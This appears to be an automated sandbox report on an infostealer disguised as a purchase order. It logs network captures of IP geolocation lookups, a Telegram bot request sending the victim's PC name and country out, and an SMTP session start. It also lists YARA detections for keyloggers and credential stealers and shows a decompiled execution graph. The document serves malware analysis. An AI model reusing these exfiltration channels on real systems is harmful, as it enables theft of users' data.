                                      2024-10-04 08:32:11 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-10-04 08:32:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.2.449742188.114.97.34437456C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      2024-10-04 08:32:12 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      2024-10-04 08:32:12 UTC684INHTTP/1.1 200 OK
                                      Date: Fri, 04 Oct 2024 08:32:12 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 62523
                                      Last-Modified: Thu, 03 Oct 2024 15:10:09 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7mhLH%2B6L0ylnt95%2FSNy7ytDGfXpSrlzG7s5ltTLnQGinaWTHn4jcbv3SzBadgaW%2BtETf%2FAuogltZnhEWqWZ0c%2Fe4MaSY1p3KdKXtyapWAqQaPJ57h5PmVHzw%2BgkStpgLNtGt%2FTAy"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8cd3d1f04d5a42a6-EWR
                                      2024-10-04 08:32:12 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-10-04 08:32:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      7192.168.2.449744188.114.97.34437456C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      2024-10-04 08:32:13 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-10-04 08:32:14 UTC676INHTTP/1.1 200 OK
                                      Date: Fri, 04 Oct 2024 08:32:14 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 62525
                                      Last-Modified: Thu, 03 Oct 2024 15:10:09 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0uhY7hCxxA8O4Zz9HxePrHQQgIrFEcYshCIIJnZYd2o8a2%2BkzPn2bLoeFDmxbLLcuC4WJr3%2FcfKhPaCwoR2haIDeVAEgG57RAGudeptysq%2BNGUzkEEpTSYY87MiKJQcYvFtExNvS"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8cd3d1f7ea12de97-EWR
                                      2024-10-04 08:32:14 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-10-04 08:32:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      8192.168.2.449746188.114.97.34437456C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      2024-10-04 08:32:15 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      2024-10-04 08:32:15 UTC706INHTTP/1.1 200 OK
                                      Date: Fri, 04 Oct 2024 08:32:15 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 62526
                                      Last-Modified: Thu, 03 Oct 2024 15:10:09 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VhCLYg79qncAO9tOdq0tei7T3pZyYC9QswnFLi%2BwEuMbA1fd552I%2BZ0UVa48m0j0PQIBRNPvNg077z0zNCoOAyxiCJb9qctrhyteVP7M75a8ez5dR%2BnC73mymP1BhWPhuUJ1B3km"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8cd3d1ffbbbec335-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-10-04 08:32:15 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-10-04 08:32:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      9192.168.2.449748149.154.167.2204437456C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      2024-10-04 08:32:16 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2006/10/2024%20/%2022:42:27%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                      Host: api.telegram.org
                                      Connection: Keep-Alive
                                      2024-10-04 08:32:16 UTC344INHTTP/1.1 404 Not Found
                                      Server: nginx/1.18.0
                                      Date: Fri, 04 Oct 2024 08:32:16 GMT
                                      Content-Type: application/json
                                      Content-Length: 55
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-10-04 08:32:16 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                      Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                      TimestampSource PortDest PortSource IPDest IPCommands
                                      Oct 4, 2024 10:32:23.039237022 CEST58749754166.62.28.135192.168.2.4220-sg2plzcpnl506897.prod.sin2.secureserver.net ESMTP Exim 4.96.2 #2 Fri, 04 Oct 2024 01:32:22 -0700
                                      220-We do not authorize the use of this system to transport unsolicited,
                                      220 and/or bulk e-mail.
                                      Oct 4, 2024 10:32:23.039473057 CEST49754587192.168.2.4166.62.28.135EHLO 724536
                                      Oct 4, 2024 10:32:23.359945059 CEST58749754166.62.28.135192.168.2.4250-sg2plzcpnl506897.prod.sin2.secureserver.net Hello 724536 [8.46.123.33]
                                      250-SIZE 52428800
                                      250-8BITMIME
                                      250-PIPELINING
                                      250-PIPECONNECT
                                      250-AUTH PLAIN LOGIN
                                      250-STARTTLS
                                      250 HELP
                                      Oct 4, 2024 10:32:23.364348888 CEST49754587192.168.2.4166.62.28.135STARTTLS
                                      Oct 4, 2024 10:32:23.685550928 CEST58749754166.62.28.135192.168.2.4220 TLS go ahead

                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:04:31:57
                                      Start date:04/10/2024
                                      Path:C:\Users\user\Desktop\z1PurchaseOrder.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\z1PurchaseOrder.exe"
                                      Imagebase:0x400000
                                      File size:1'220'789 bytes
                                      MD5 hash:3EBEF42F57673D6B260644654522B053
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.1696353856.0000000000B20000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                      Reputation:low
                                      Has exited:true

                                      Target ID:1
                                      Start time:04:32:00
                                      Start date:04/10/2024
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\z1PurchaseOrder.exe"
                                      Imagebase:0xe20000
                                      File size:45'984 bytes
                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000001.00000002.4133626873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.4136012994.0000000003271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4135278141.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.4135278141.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.4135278141.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000002.4135278141.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4136012994.000000000337F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.4136012994.000000000337F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.4135278141.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      Reputation:high
                                      Has exited:false

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:3%
                                        Dynamic/Decrypted Code Coverage:1.1%
                                        Signature Coverage:3.3%
                                        Total number of Nodes:1580
                                        Total number of Limit Nodes:38
                                        execution_graph 90596 40f110 RegOpenKeyExW 90597 40f13c RegQueryValueExW RegCloseKey 90596->90597 90598 40f15f 90596->90598 90597->90598 90599 429212 90604 410b90 90599->90604 90602 411421 __cinit 74 API calls 90603 42922f 90602->90603 90605 410b9a __write_nolock 90604->90605 90606 41171a 75 API calls 90605->90606 90607 410c31 GetModuleFileNameW 90606->90607 90621 413db0 90607->90621 90609 410c66 _wcsncat 90624 413e3c 90609->90624 90612 41171a 75 API calls 90613 410ca3 _wcscpy 90612->90613 90614 410cd1 RegOpenKeyExW 90613->90614 90615 429bc3 RegQueryValueExW 90614->90615 90616 410cf7 90614->90616 90617 429cd9 RegCloseKey 90615->90617 90618 429bf2 _wcscat _wcslen _wcsncpy 90615->90618 90616->90602 90619 41171a 75 API calls 90618->90619 90620 429cd8 90618->90620 90619->90618 90620->90617 90627 413b95 90621->90627 90657 41abec 90624->90657 90628 413c2f 90627->90628 90634 413bae 90627->90634 90629 413d60 90628->90629 90630 413d7b 90628->90630 90653 417f23 67 API calls __getptd_noexit 90629->90653 90655 417f23 67 API calls __getptd_noexit 90630->90655 90633 413d65 90639 413cfb 90633->90639 90654 417ebb 6 API calls 2 library calls 90633->90654 90634->90628 90643 413c1d 90634->90643 90649 41ab19 67 API calls 2 library calls 90634->90649 90637 413d03 90637->90628 90637->90639 90640 413d8e 90637->90640 90638 413cb9 90638->90628 90641 413cd6 90638->90641 90651 41ab19 67 API calls 2 library calls 90638->90651 90639->90609 90656 41ab19 67 API calls 2 library calls 90640->90656 90641->90628 90641->90639 90645 413cef 90641->90645 90643->90628 90648 413c9b 90643->90648 90650 41ab19 67 API calls 2 library calls 90643->90650 90652 41ab19 67 API calls 2 library calls 90645->90652 90648->90637 90648->90638 90649->90643 90650->90648 90651->90641 90652->90639 90653->90633 90655->90633 90656->90639 90658 41ac02 90657->90658 90659 41abfd 90657->90659 90666 417f23 67 API calls __getptd_noexit 90658->90666 90659->90658 90662 41ac22 90659->90662 90663 410c99 90662->90663 90668 417f23 67 API calls __getptd_noexit 90662->90668 90663->90612 90665 41ac07 90667 417ebb 6 API calls 2 library calls 90665->90667 90666->90665 90668->90665 90669 401230 90670 401241 _memset 90669->90670 90671 4012c5 90669->90671 90684 401be0 90670->90684 90673 40126b 90674 4012ae KillTimer SetTimer 90673->90674 90675 42aa61 90673->90675 90676 401298 90673->90676 90674->90671 90677 42aa8b Shell_NotifyIconW 90675->90677 90678 42aa69 Shell_NotifyIconW 90675->90678 90679 4012a2 90676->90679 90680 42aaac 90676->90680 90677->90674 90678->90674 90679->90674 90683 42aaf8 Shell_NotifyIconW 90679->90683 90681 42aad7 Shell_NotifyIconW 90680->90681 90682 42aab5 Shell_NotifyIconW 90680->90682 90681->90674 90682->90674 90683->90674 90685 401bfb 90684->90685 90705 401cde 90684->90705 90706 4013a0 75 API calls 90685->90706 90687 401c0b 90688 42a9a0 LoadStringW 90687->90688 90689 401c18 90687->90689 90691 42a9bb 90688->90691 90707 4021e0 90689->90707 90720 40df50 75 API calls 90691->90720 90692 401c2d 90694 401c3a 90692->90694 90695 42a9cd 90692->90695 90694->90691 90696 401c44 90694->90696 90721 40d3b0 75 API calls 2 library calls 90695->90721 90719 40d3b0 75 API calls 2 library calls 90696->90719 90699 42a9dc 90700 42a9f0 90699->90700 90702 401c53 _memset _wcscpy _wcsncpy 90699->90702 90722 40d3b0 75 API calls 2 library calls 90700->90722 90704 401cc2 Shell_NotifyIconW 90702->90704 90703 42a9fe 90704->90705 90705->90673 90706->90687 90708 4021f1 _wcslen 90707->90708 90709 42a598 90707->90709 90712 402205 90708->90712 90713 402226 90708->90713 90725 40c740 90709->90725 90711 42a5a2 90723 404020 75 API calls ctype 90712->90723 90724 401380 75 API calls 90713->90724 90716 40220c _realloc 90716->90692 90717 40222d 90717->90711 90718 41171a 75 API calls 90717->90718 90718->90716 90719->90702 90720->90702 90721->90699 90722->90703 90723->90716 90724->90717 90726 40c752 90725->90726 90727 40c747 90725->90727 90726->90711 90727->90726 90730 402ae0 75 API calls _realloc 90727->90730 90729 42a572 _realloc 90729->90711 90730->90729 90731 4034b0 90732 4034b9 90731->90732 90733 4034bd 90731->90733 90734 42a0ba 90733->90734 90735 41171a 75 API calls 90733->90735 90736 4034fe _realloc ctype 90735->90736 89248 4161c2 89249 4161d3 89248->89249 89283 41aa31 HeapCreate 89249->89283 89252 416212 89285 416e29 GetModuleHandleW 89252->89285 89256 416223 __RTC_Initialize 89319 41b669 89256->89319 89259 416231 89260 41623d GetCommandLineW 89259->89260 89388 4117af 67 API calls 3 library calls 89259->89388 89334 42235f GetEnvironmentStringsW 89260->89334 89263 41623c 89263->89260 89264 41624c 89340 4222b1 GetModuleFileNameW 89264->89340 89266 416256 89267 416261 89266->89267 89389 4117af 67 API calls 3 library calls 89266->89389 89344 422082 89267->89344 89273 416279 89276 416284 __wwincmdln 89273->89276 89391 4117af 67 API calls 3 library calls 89273->89391 89274 416272 89357 41186e 89274->89357 89363 40d7f0 89276->89363 89279 4162b3 89393 411a4b 67 API calls _doexit 89279->89393 89282 4162b8 __mtinitlocknum 89284 416206 89283->89284 89284->89252 89386 41616a 67 API calls 3 library calls 89284->89386 89286 416e44 89285->89286 89287 416e3d 89285->89287 89289 416fac 89286->89289 89290 416e4e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 89286->89290 89394 41177f Sleep GetModuleHandleW 89287->89394 89424 416ad5 70 API calls 2 library calls 89289->89424 89292 416e97 TlsAlloc 89290->89292 89291 416e43 89291->89286 89295 416218 89292->89295 89296 416ee5 TlsSetValue 89292->89296 89295->89256 89387 41616a 67 API calls 3 library calls 89295->89387 89296->89295 89297 416ef6 89296->89297 89395 411a69 6 API calls 4 library calls 89297->89395 89299 416efb 89396 41696e TlsGetValue 89299->89396 89302 41696e __encode_pointer 6 API calls 89303 416f16 89302->89303 89304 41696e __encode_pointer 6 API calls 89303->89304 89305 416f26 89304->89305 89306 41696e __encode_pointer 6 API calls 89305->89306 89307 416f36 89306->89307 89406 41828b InitializeCriticalSectionAndSpinCount __mtinitlocknum 89307->89406 89309 416f43 89309->89289 89407 4169e9 TlsGetValue 89309->89407 89314 4169e9 __decode_pointer 6 API calls 89315 416f8a 89314->89315 89315->89289 89316 416f91 89315->89316 89423 416b12 67 API calls 5 library calls 89316->89423 89318 416f99 GetCurrentThreadId 89318->89295 89537 41718c 89319->89537 89321 41b675 GetStartupInfoA 89322 416ffb __calloc_crt 67 API calls 89321->89322 89328 41b696 89322->89328 89323 41b8b4 __mtinitlocknum 89323->89259 89324 41b831 GetStdHandle 89333 41b7fb 89324->89333 89325 416ffb __calloc_crt 67 API calls 89325->89328 89326 41b896 SetHandleCount 89326->89323 89327 41b843 GetFileType 89327->89333 89328->89323 89328->89325 89329 41b77e 89328->89329 89328->89333 89329->89323 89330 41b7a7 GetFileType 89329->89330 89329->89333 89538 4189e6 InitializeCriticalSectionAndSpinCount __mtinitlocknum 89329->89538 89330->89329 89333->89323 89333->89324 89333->89326 89333->89327 89539 4189e6 InitializeCriticalSectionAndSpinCount __mtinitlocknum 89333->89539 89335 422370 89334->89335 89336 422374 89334->89336 89335->89264 89337 416fb6 __malloc_crt 67 API calls 89336->89337 89338 422395 _realloc 89337->89338 89339 42239c FreeEnvironmentStringsW 89338->89339 89339->89264 89341 4222e6 _wparse_cmdline 89340->89341 89342 416fb6 __malloc_crt 67 API calls 89341->89342 89343 422329 _wparse_cmdline 89341->89343 89342->89343 89343->89266 89345 42209a _wcslen 89344->89345 89347 416267 89344->89347 89346 416ffb __calloc_crt 67 API calls 89345->89346 89349 4220be _wcslen 89346->89349 89347->89274 89390 4117af 67 API calls 3 library calls 89347->89390 89348 422123 89350 413a88 __mtinitlocknum 67 API calls 89348->89350 89349->89347 89349->89348 89351 416ffb __calloc_crt 67 API calls 89349->89351 89352 422149 89349->89352 89355 422108 89349->89355 89540 426349 67 API calls 2 library calls 89349->89540 89350->89347 89351->89349 89354 413a88 __mtinitlocknum 67 API calls 89352->89354 89354->89347 89355->89349 89541 417d93 10 API calls 3 library calls 89355->89541 89358 41187c __IsNonwritableInCurrentImage 89357->89358 89542 418486 89358->89542 89360 41189a __initterm_e 89362 4118b9 __IsNonwritableInCurrentImage __initterm 89360->89362 89546 411421 89360->89546 89362->89273 89364 431bcb 89363->89364 89365 40d80c 89363->89365 89590 4092c0 89365->89590 89367 40d847 89594 40eb50 89367->89594 89372 40d888 89598 411b24 67 API calls 2 library calls 89372->89598 89374 40d891 89599 40f370 SystemParametersInfoW SystemParametersInfoW 89374->89599 89375 40d877 89597 411ac6 67 API calls 4 library calls 89375->89597 89377 40d89f 89600 40d6d0 GetCurrentDirectoryW 89377->89600 89379 40d8a7 SystemParametersInfoW 89380 40d8d4 89379->89380 89381 40d8cd FreeLibrary 89379->89381 89382 4092c0 VariantClear 89380->89382 89381->89380 89383 40d8dd 89382->89383 89384 4092c0 VariantClear 89383->89384 89385 40d8e6 89384->89385 89385->89279 89392 411a1f 67 API calls _doexit 89385->89392 89386->89252 89387->89256 89388->89263 89389->89267 89390->89274 89391->89276 89392->89279 89393->89282 89394->89291 89395->89299 89397 4169a7 GetModuleHandleW 89396->89397 89398 416986 89396->89398 89400 4169c2 GetProcAddress 89397->89400 89401 4169b7 89397->89401 89398->89397 89399 416990 TlsGetValue 89398->89399 89404 41699b 89399->89404 89403 41699f 89400->89403 89425 41177f Sleep GetModuleHandleW 89401->89425 89403->89302 89404->89397 89404->89403 89405 4169bd 89405->89400 89405->89403 89406->89309 89408 416a01 89407->89408 89409 416a22 GetModuleHandleW 89407->89409 89408->89409 89412 416a0b TlsGetValue 89408->89412 89410 416a32 89409->89410 89411 416a3d GetProcAddress 89409->89411 89426 41177f Sleep GetModuleHandleW 89410->89426 89414 416a1a 89411->89414 89415 416a16 89412->89415 89414->89289 89417 416ffb 89414->89417 89415->89409 89415->89414 89416 416a38 89416->89411 89416->89414 89420 417004 89417->89420 89419 416f70 89419->89289 89419->89314 89420->89419 89421 417022 Sleep 89420->89421 89427 422452 89420->89427 89422 417037 89421->89422 89422->89419 89422->89420 89423->89318 89424->89295 89425->89405 89426->89416 89428 42245e __mtinitlocknum 89427->89428 89429 422476 89428->89429 89439 422495 _memset 89428->89439 89440 417f23 67 API calls __getptd_noexit 89429->89440 89431 